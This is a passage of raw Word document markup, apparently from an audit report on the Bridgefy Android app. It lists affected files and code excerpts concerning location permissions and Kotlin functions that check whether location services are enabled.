        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uses-permission[...] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.permission.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ACCESS_COARSE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="62A25C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>uses-permission[...] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>android:name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"android.permission.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>ACCESS_FINE_LOCATION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-android/app/src/main/kotlin/me/bridgefy/main/util/BridgefyUtils.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="37"/>
        <w:ind w:left="1907" w:right="3596" w:hanging="1188"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>isLocationAvailable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>verifyLocationEnabled(context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="1907" w:right="2862" w:hanging="1188"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>verifyLocationEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>var </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>locationProvider: String? = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="1187"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>locationProvider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-19"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Settings.Secure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getString</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context.contentResolver, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Settings.Secure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LOCATION_MODE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>!TextUtils.isEmpty(locationProvider)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="112"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-android/bridgefy-commons/src/main/java/me/bridgefy/commons/utils/Blueto othUtils.kt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>fun </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>isLocationAvailable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(context: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>): Boolean </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="1907" w:right="1544" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>thrown</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>provider</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="959895"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>permitted. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return try </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>val </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lm = context.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>getSystemService</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(Context.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>LOCATION_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>LocationManager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="2303" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>isThingsDevice(context)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>||</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="32"/>
        <w:ind w:left="720" w:right="2112" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>lm.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>isProviderEnabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>(LocationManager.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
